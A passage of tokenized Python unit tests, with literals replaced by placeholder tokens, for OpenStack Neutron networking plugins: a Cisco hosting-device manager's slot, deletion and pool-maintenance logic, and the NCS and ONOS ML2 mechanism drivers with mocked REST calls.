getattr ( self . _devmgr , get_method ) <EOL> template_id = id or hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> driver = driver_getter ( context , template_id ) <EOL> if test_for_none : <EOL> self . assertIsNone ( driver ) <EOL> else : <EOL> self . assertIsNotNone ( driver ) <EOL> def test_get_hosting_device_driver ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' ) <EOL> def test_get_non_existent_hosting_device_driver_returns_none ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> def test_get_plugging_device_driver ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' ) <EOL> def test_get_non_existent_plugging_device_driver_returns_none ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' , '<STR_LIT>' , <EOL> True ) <EOL> def test_get_device_info_for_agent ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt , self . port ( <EOL> subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> mgmt_ip = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = True ) <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( context , hd_id ) <EOL> info = self . _devmgr . get_device_info_for_agent ( context , hd_db ) <EOL> self . assertEqual ( mgmt_ip , info [ '<STR_LIT>' ] ) <EOL> def test_get_device_info_for_agent_no_mgmt_port ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> mgmt_ip = '<STR_LIT>' <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_ip_address = mgmt_ip , <EOL> management_port_id = None , <EOL> credentials_id = creds ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = True ) <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( context , hd_id ) <EOL> info = self . _devmgr . get_device_info_for_agent ( context , hd_db ) <EOL> self . assertEqual ( mgmt_ip , info [ '<STR_LIT>' ] ) <EOL> def _set_ownership ( self , bound_status , tenant_id , other_tenant_id = None ) : <EOL> if bound_status == UNBOUND : <EOL> return None <EOL> elif bound_status == OTHER : <EOL> return other_tenant_id or self . _other_tenant_id <EOL> else : <EOL> return tenant_id <EOL> def _test_slots ( self , expected_result = True , expected_bind = UNBOUND , <EOL> expected_allocation = VM_SLOT_CAPACITY , <EOL> num_requested = VM_SLOT_CAPACITY , <EOL> slot_capacity = VM_SLOT_CAPACITY , initial_bind = UNBOUND , <EOL> bind = False , auto_delete = True , is_admin = False , <EOL> pool_maintenance_expected = True , test_release = False , <EOL> expected_release_result = True , expected_final_allocation = <NUM_LIT:0> , <EOL> expected_release_bind = UNBOUND , <EOL> num_to_release = VM_SLOT_CAPACITY , <EOL> release_pool_maintenance_expected = True ) : <EOL> with self . hosting_device_template ( <EOL> slot_capacity = slot_capacity ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> resource = self . _get_fake_resource ( ) <EOL> tenant_bound = self . _set_ownership ( <EOL> initial_bind , resource [ '<STR_LIT>' ] ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> tenant_bound = tenant_bound , <EOL> auto_delete = auto_delete ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = is_admin ) <EOL> hd_db = self . _devmgr . _get_hosting_device ( <EOL> context , hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> with mock . patch . object ( <EOL> hdm_db . HostingDeviceManagerMixin , <EOL> '<STR_LIT>' ) as pm_mock : <EOL> result = self . _devmgr . acquire_hosting_device_slots ( <EOL> context , hd_db , resource , '<STR_LIT>' , L3_ROUTER_NAT , <EOL> num_requested , bind ) <EOL> allocation = self . _devmgr . get_slot_allocation ( <EOL> context , resource_id = resource [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( expected_result , result ) <EOL> self . assertEqual ( expected_allocation , allocation ) <EOL> expected_bind = self . _set_ownership ( <EOL> expected_bind , resource [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_bind , hd_db . tenant_bound ) <EOL> if pool_maintenance_expected : <EOL> pm_mock . assert_called_once_with ( mock . ANY ) <EOL> num_calls = <NUM_LIT:1> <EOL> else : <EOL> pm_mock . assert_not_called ( ) <EOL> num_calls = <NUM_LIT:0> <EOL> if test_release : <EOL> result = self . _devmgr . release_hosting_device_slots ( <EOL> context , hd_db , resource , num_to_release ) <EOL> if not test_release : <EOL> return <EOL> allocation = self . _devmgr . get_slot_allocation ( <EOL> context , resource_id = resource [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( expected_release_result , result ) <EOL> self . assertEqual ( expected_final_allocation , <EOL> allocation ) <EOL> expected_release_bind = self . _set_ownership ( <EOL> expected_release_bind , resource [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_release_bind , <EOL> hd_db . tenant_bound ) <EOL> if release_pool_maintenance_expected : <EOL> num_calls += <NUM_LIT:1> <EOL> self . assertEqual ( num_calls , pm_mock . call_count ) <EOL> else : <EOL> num_to_release = <NUM_LIT:0> <EOL> to_clean_up = num_requested - num_to_release <EOL> if to_clean_up < <NUM_LIT:0> : <EOL> to_clean_up = num_requested <EOL> if to_clean_up : <EOL> self . _devmgr . release_hosting_device_slots ( <EOL> context , hd_db , resource , to_clean_up ) <EOL> def test_acquire_with_slot_surplus_in_owned_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True ) <EOL> def test_acquire_with_slot_surplus_in_shared_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( ) <EOL> def test_acquire_with_slot_surplus_take_hosting_device_ownership_succeeds ( <EOL> self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = UNBOUND , <EOL> bind = True ) <EOL> def test_acquire_with_slot_surplus_drop_hosting_device_ownership_succeeds ( <EOL> self ) : <EOL> self . _test_slots ( expected_bind = UNBOUND , initial_bind = REQUESTER , <EOL> bind = False ) <EOL> def test_acquire_slots_release_hosting_device_ownership_affects_all ( self ) : <EOL> pass <EOL> def test_acquire_slots_in_other_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False ) <EOL> def test_acquire_slots_take_ownership_of_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> bind = True , pool_maintenance_expected = False ) <EOL> def test_acquire_slots_take_ownership_of_multi_tenant_hosting_device_fails ( <EOL> self ) : <EOL> pass <EOL> def test_acquire_with_slot_deficit_in_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = REQUESTER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = REQUESTER , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_acquire_with_slot_deficit_in_shared_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = UNBOUND , <EOL> expected_allocation = <NUM_LIT:0> , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_acquire_with_slot_deficit_in_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> , <EOL> pool_maintenance_expected = False ) <EOL> def test_release_allocated_slots_in_owned_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_bind = REQUESTER , <EOL> expected_final_allocation = <NUM_LIT:1> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> ) <EOL> def test_release_allocated_slots_in_shared_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( test_release = True , expected_final_allocation = <NUM_LIT:1> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> ) <EOL> def test_release_all_slots_returns_hosting_device_ownership ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_bind = UNBOUND ) <EOL> def test_release_slots_in_other_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False , <EOL> test_release = True , expected_release_result = False , <EOL> expected_release_bind = OTHER , <EOL> expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> , <EOL> release_pool_maintenance_expected = False ) <EOL> def test_release_too_many_slots_in_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_result = False , <EOL> expected_release_bind = REQUESTER , <EOL> expected_final_allocation = VM_SLOT_CAPACITY , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_release_too_many_slots_in_shared_hosting_device_fails ( self ) : <EOL> self . _test_slots ( test_release = True , expected_release_result = False , <EOL> expected_release_bind = UNBOUND , <EOL> expected_final_allocation = VM_SLOT_CAPACITY , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_release_too_many_slots_in_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False , <EOL> test_release = True , expected_release_result = False , <EOL> expected_release_bind = OTHER , <EOL> expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> , <EOL> release_pool_maintenance_expected = False ) <EOL> def test_release_all_slots_by_negative_num_argument_shared_hosting_device ( <EOL> self ) : <EOL> self . _test_slots ( test_release = True , expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = - <NUM_LIT:1> ) <EOL> def test_release_all_slots_by_negative_num_argument_owned_hosting_device ( <EOL> self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , expected_release_bind = UNBOUND , <EOL> expected_final_allocation = <NUM_LIT:0> , num_to_release = - <NUM_LIT:1> ) <EOL> def _test_delete ( self , to_delete = None , auto_delete = None , no_delete = None , <EOL> force_delete = True , expected_num_remaining = <NUM_LIT:0> ) : <EOL> auto_delete = auto_delete or [ True , False , False , True , True ] <EOL> no_delete = no_delete or [ True , True , True , True , True ] <EOL> with self . hosting_device_template ( ) as hdt1 , self . hosting_device_template ( ) as hdt2 : <EOL> hdt0_id = hdt1 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hdt1_id = hdt2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:0> ] ) as mgmt_port0 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:1> ] ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:2> ] ) as mgmt_port2 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:3> ] ) as mgmt_port3 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:4> ] ) as mgmt_port4 : <EOL> mp0_id = mgmt_port0 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp1_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp2_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp3_id = mgmt_port3 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp4_id = mgmt_port4 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp0_id , auto_delete = auto_delete [ <NUM_LIT:0> ] , <EOL> no_delete = no_delete [ <NUM_LIT:0> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt1_id , <EOL> management_port_id = mp1_id , auto_delete = auto_delete [ <NUM_LIT:1> ] , <EOL> no_delete = no_delete [ <NUM_LIT:1> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp2_id , auto_delete = auto_delete [ <NUM_LIT:2> ] , <EOL> no_delete = no_delete [ <NUM_LIT:2> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp3_id , <EOL> auto_delete = auto_delete [ <NUM_LIT:3> ] , <EOL> no_delete = no_delete [ <NUM_LIT:3> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt1_id , <EOL> management_port_id = mp4_id , auto_delete = auto_delete [ <NUM_LIT:4> ] , <EOL> no_delete = no_delete [ <NUM_LIT:4> ] ) : <EOL> context = self . _get_test_context ( is_admin = True ) <EOL> if to_delete is None : <EOL> self . _devmgr . delete_all_hosting_devices ( <EOL> context , force_delete ) <EOL> elif to_delete == <NUM_LIT:0> : <EOL> template = ( <EOL> self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt0_id ) ) <EOL> ( self . _devmgr . <EOL> delete_all_hosting_devices_by_template ( <EOL> context , template , force_delete ) ) <EOL> else : <EOL> template = ( <EOL> self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt1_id ) ) <EOL> ( self . _devmgr . <EOL> delete_all_hosting_devices_by_template ( <EOL> context , template , force_delete ) ) <EOL> result_hds = self . _list ( <EOL> '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( expected_num_remaining , <EOL> len ( result_hds ) ) <EOL> def test_delete_all_hosting_devices ( self ) : <EOL> self . _test_delete ( ) <EOL> def test_delete_all_managed_hosting_devices ( self ) : <EOL> self . _test_delete ( no_delete = [ True , False , False , True , True ] , <EOL> force_delete = False , expected_num_remaining = <NUM_LIT:2> ) <EOL> def test_delete_all_hosting_devices_by_template ( self ) : <EOL> self . _test_delete ( to_delete = <NUM_LIT:1> , expected_num_remaining = <NUM_LIT:3> , <EOL> no_delete = [ False , True , False , False , True ] ) <EOL> def test_delete_all_managed_hosting_devices_by_template ( self ) : <EOL> self . _test_delete ( to_delete = <NUM_LIT:1> , expected_num_remaining = <NUM_LIT:4> , <EOL> no_delete = [ False , False , False , False , True ] , <EOL> force_delete = False ) <EOL> def _test_failed_hosting_device ( self , host_category = VM_CATEGORY , <EOL> expected_num_remaining = <NUM_LIT:0> , <EOL> auto_delete = True , no_delete = True ) : <EOL> with self . hosting_device_template ( host_category = host_category ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete ) as mgmt_port : <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = auto_delete , no_delete = no_delete ) as hd : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> m2 = mock . MagicMock ( ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : m2 } <EOL> context = self . _get_test_context ( ) <EOL> self . _devmgr . handle_non_responding_hosting_devices ( <EOL> context , None , [ hd_id ] ) <EOL> result_hds = self . _list ( '<STR_LIT>' ) [ <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( expected_num_remaining , <EOL> len ( result_hds ) ) <EOL> l3mock = ( NeutronManager . get_service_plugins ( ) . get ( ) . <EOL> handle_non_responding_hosting_devices ) <EOL> l3mock . assert_called_once_with ( mock . ANY , mock . ANY , <EOL> { hd_id : { } } ) <EOL> if expected_num_remaining == <NUM_LIT:0> : <EOL> m2 . hosting_devices_removed . assert_called_once_with ( <EOL> mock . ANY , { hd_id : { } } , False , None ) <EOL> def test_failed_managed_vm_based_hosting_device_gets_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( ) <EOL> def test_failed_non_managed_vm_based_hosting_device_not_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( expected_num_remaining = <NUM_LIT:1> , <EOL> auto_delete = False , no_delete = False ) <EOL> def test_failed_non_vm_based_hosting_device_not_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( host_category = HW_CATEGORY , <EOL> expected_num_remaining = <NUM_LIT:1> , <EOL> no_delete = False ) <EOL> def _test_pool_maintenance ( self , desired_slots_free = <NUM_LIT:10> , slot_capacity = <NUM_LIT:3> , <EOL> host_category = VM_CATEGORY , expected = <NUM_LIT:15> , <EOL> define_credentials = True ) : <EOL> with self . hosting_device_template ( <EOL> host_category = host_category , slot_capacity = slot_capacity , <EOL> desired_slots_free = desired_slots_free , <EOL> plugging_driver = TEST_PLUGGING_DRIVER ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> creds_id = ( DEFAULT_CREDENTIALS_ID if define_credentials is True <EOL> else '<STR_LIT>' ) <EOL> credentials = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> with mock . patch . dict ( <EOL> self . plugin . _credentials , <EOL> { creds_id : credentials } ) , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = True ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = True ) as mgmt_port2 : <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , no_delete = True ) , self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , no_delete = True ) : <EOL> context = self . _get_test_context ( is_admin = True ) <EOL> template = self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt_id ) <EOL> self . _devmgr . _gt_pool = mock . MagicMock ( ) <EOL> self . _devmgr . _gt_pool . spawn_n . side_effect = ( <EOL> lambda fcn , ctx , tmplt : fcn ( ctx , tmplt ) ) <EOL> self . _devmgr . _dispatch_pool_maintenance_job ( <EOL> template ) <EOL> result_hds = self . _list ( <EOL> '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( expected , len ( result_hds ) * slot_capacity ) <EOL> self . _devmgr . delete_all_hosting_devices ( context , True ) <EOL> def test_vm_based_hosting_device_excessive_slot_deficit_adds_slots ( self ) : <EOL> self . _test_pool_maintenance ( ) <EOL> def test_vm_based_hosting_device_excessive_slot_deficit_no_credentials ( <EOL> self ) : <EOL> self . _test_pool_maintenance ( expected = <NUM_LIT:6> , define_credentials = False ) <EOL> def test_vm_based_hosting_device_marginal_slot_deficit_no_change ( self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:7> , expected = <NUM_LIT:6> ) <EOL> def test_vm_based_hosting_device_excessive_slot_surplus_removes_slots ( <EOL> self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:3> , expected = <NUM_LIT:3> ) <EOL> def test_vm_based_hosting_device_marginal_slot_surplus_no_change ( self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:5> , expected = <NUM_LIT:6> ) <EOL> def test_hw_based_hosting_device_no_change ( self ) : <EOL> self . _test_pool_maintenance ( host_category = HW_CATEGORY , expected = <NUM_LIT:6> ) </s>
<s> from networking_cisco . plugins . ml2 . drivers . cisco . ncs import driver <EOL> from neutron . tests . unit . plugins . ml2 import test_plugin <EOL> class NCSTestCase ( test_plugin . Ml2PluginV2TestCase ) : <EOL> _mechanism_drivers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( NCSTestCase , self ) . setUp ( ) <EOL> self . port_create_status = '<STR_LIT>' <EOL> driver . NCSMechanismDriver . sendjson = self . check_sendjson <EOL> def check_sendjson ( self , method , urlpath , obj ) : <EOL> self . assertFalse ( urlpath . startswith ( "<STR_LIT>" ) ) <EOL> class NCSMechanismTestBasicGet ( test_plugin . TestMl2BasicGet , NCSTestCase ) : <EOL> pass <EOL> class NCSMechanismTestNetworksV2 ( test_plugin . TestMl2NetworksV2 , NCSTestCase ) : <EOL> pass <EOL> class NCSMechanismTestPortsV2 ( test_plugin . TestMl2PortsV2 , NCSTestCase ) : <EOL> pass </s>
<s> import pbr . version <EOL> __version__ = pbr . version . VersionInfo ( <EOL> '<STR_LIT>' ) . version_string ( ) </s>
<s> import mock <EOL> import requests <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from oslotest import base <EOL> from neutron . common import constants as n_const <EOL> from neutron . plugins . common import constants <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> from neutron . plugins . ml2 import driver_context as ctx <EOL> import networking_onos . plugins . ml2 . driver as onos_ml2_driver <EOL> fake_network_uuid = '<STR_LIT>' <EOL> fake_network_object = { '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : fake_network_uuid , <EOL> '<STR_LIT>' : None } <EOL> fake_subnet_uuid = '<STR_LIT>' <EOL> fake_subnet_object = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : [ { '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : fake_subnet_uuid , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : fake_network_uuid , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False } <EOL> fake_port_uuid = '<STR_LIT>' <EOL> fake_port_object = { '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:id>' : fake_port_uuid , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : fake_network_uuid , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class ONOSMechanismDriverTestCase ( base . BaseTestCase , <EOL> onos_ml2_driver . ONOSMechanismDriver ) : <EOL> def setUp ( self ) : <EOL> super ( ONOSMechanismDriverTestCase , self ) . setUp ( ) <EOL> self . set_test_config ( ) <EOL> def set_test_config ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . onos_path = cfg . CONF . onos . url_path <EOL> self . onos_auth = ( cfg . CONF . onos . username , <EOL> cfg . CONF . onos . password ) <EOL> def _mock_req_resp ( self , status_code ) : <EOL> response = mock . Mock ( status_code = status_code ) <EOL> response . raise_for_status = mock . Mock ( ) <EOL> return response <EOL> def _test_response ( self , context , oper_type , obj_type , mock_method ) : <EOL> body = None <EOL> if oper_type is not '<STR_LIT>' : <EOL> entity = { obj_type : context . current . copy ( ) } <EOL> body = jsonutils . dumps ( entity , indent = <NUM_LIT:2> ) <EOL> if oper_type == '<STR_LIT>' : <EOL> url = '<STR_LIT>' % ( self . onos_path , obj_type + '<STR_LIT:s>' ) <EOL> else : <EOL> url = '<STR_LIT>' % ( self . onos_path , obj_type + '<STR_LIT:s>' , <EOL> context . current [ '<STR_LIT:id>' ] ) <EOL> kwargs = { '<STR_LIT:url>' : url , '<STR_LIT:data>' : body } <EOL> mock_method . assert_called_once_with ( <EOL> method = oper_type , <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } , <EOL> auth = self . onos_auth , ** kwargs ) <EOL> def test_create_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_network_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . create_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_update_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_network_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_delete_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_network_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_create_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_subnet_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . create_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_update_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_subnet_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_delete_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_subnet_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_create_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_port_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . create_port_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> def test_update_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_port_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_port_postcommit ( context ) <EOL> 